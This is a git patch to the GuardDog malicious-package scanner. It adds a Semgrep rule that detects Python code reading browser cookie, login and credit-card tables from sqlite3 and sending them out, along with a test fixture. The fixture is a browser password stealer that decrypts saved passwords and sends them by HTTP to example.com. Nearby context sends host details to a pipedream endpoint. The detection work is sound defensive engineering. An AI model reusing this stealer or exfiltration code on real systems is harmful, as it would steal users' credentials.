From 8545867a71df48ce818039e9c8e8a48318db340b Mon Sep 17 00:00:00 2001 From: Ian Kretz <44385082+ikretz@users.noreply.github.com> Date: Fri, 19 Jul 2024 12:13:50 +0200 Subject: [PATCH] Add detection for Python sqlite3 data exfiltration (#420) * Add Python sqlite3 data exfiltration rule coverage * Incorporate change requests * Match only on targeted table names --- .../sourcecode/exfiltrate-sensitive-data.yml | 12 ++++++++++ .../sourcecode/exfiltrate-sensitive-data.py | 23 +++++++++++++++++++ 2 files changed, 35 insertions(+) diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml index 81887d68..605ee395 100644 --- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml +++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml @@ -31,6 +31,18 @@ rules: - metavariable-regex: metavariable: $ENVVAR regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\']) + - patterns: + - pattern-inside: | + $CONNECT = sqlite3.connect(...) + ... + $CURSOR = $CONNECT.cursor(...) + ... + - pattern: $CURSOR.execute($QUERY, ...) + - metavariable-pattern: + metavariable: $QUERY + patterns: + - pattern: "..." + - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins) pattern-sinks: - pattern-either: - pattern-inside: requests.$METHOD(...) diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py index 80021ad8..05ba1867 100644 --- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py +++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py @@ -226,3 +226,26 @@ def run(self): ploads = {'hostname':hostname,'cwd':cwd,'username':username} # ruleid: exfiltrate-sensitive-data requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads) + + +""" RULEID: sqlite3 data exfiltration +""" + +def steal_passwords2(self, name: str, path: str, profile: str): + path = "path" + if not os.path.isfile(path): + return + loginvault = self.random_dir_create() + copy2(path, loginvault) + conn = sqlite3.connect(loginvault) + cursor = conn.cursor() + with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f: + for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall(): + url, username, password = res + password = self.dcrpt_val(password, self.masterkey) + if url != "": + params = {'url': url, 'username': username, 'password': password} + # ruleid: exfiltrate-sensitive-data + requests.get("https://example.com", params=params) + cursor.close() + conn.close()